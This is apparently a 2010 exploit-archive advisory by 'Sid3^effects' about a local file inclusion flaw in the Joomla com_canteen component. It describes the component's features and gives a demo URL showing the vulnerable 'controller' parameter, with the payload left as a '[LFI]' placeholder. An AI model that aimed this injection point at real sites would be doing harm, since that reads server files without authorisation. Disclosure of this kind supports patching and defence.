The Joomla Canteen component suffers from a local file inclusion vulnerability.
98715aede7fec4513170d92b850b2a172aba4a7a5ae496ac33a0d9fbdaa2941a
Name : Joomla com_canteen LFI Vulnerability
Date : july 9,2010
vendor URL :http://miniwork.eu/
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description
This component is written for canteens. You can easily manage daily menu with this component.
Features:
+ possible to create groups of meals (e.g. Breakfast, Lunch, Dinner)
+ possible to create subgroups of meals (e.g. soup, desert)
+ enable/disable showing prices
+ enable/disable ordering for groups or subgroups
+ manage sort order of groups, subgroups
+ manage users (customers)
+ manage daily meal
+ manage user's orders
+ import meal by xml file
+ bursa users can order meal from bursa
+ statistics
#######################################################################################################
Xploit: LFI Vulnerability
Demo url : http://server/path/index.php?option=com_canteen&controller=[LFI]
#######################################################################################################
# 0day no more
# Sid3^effects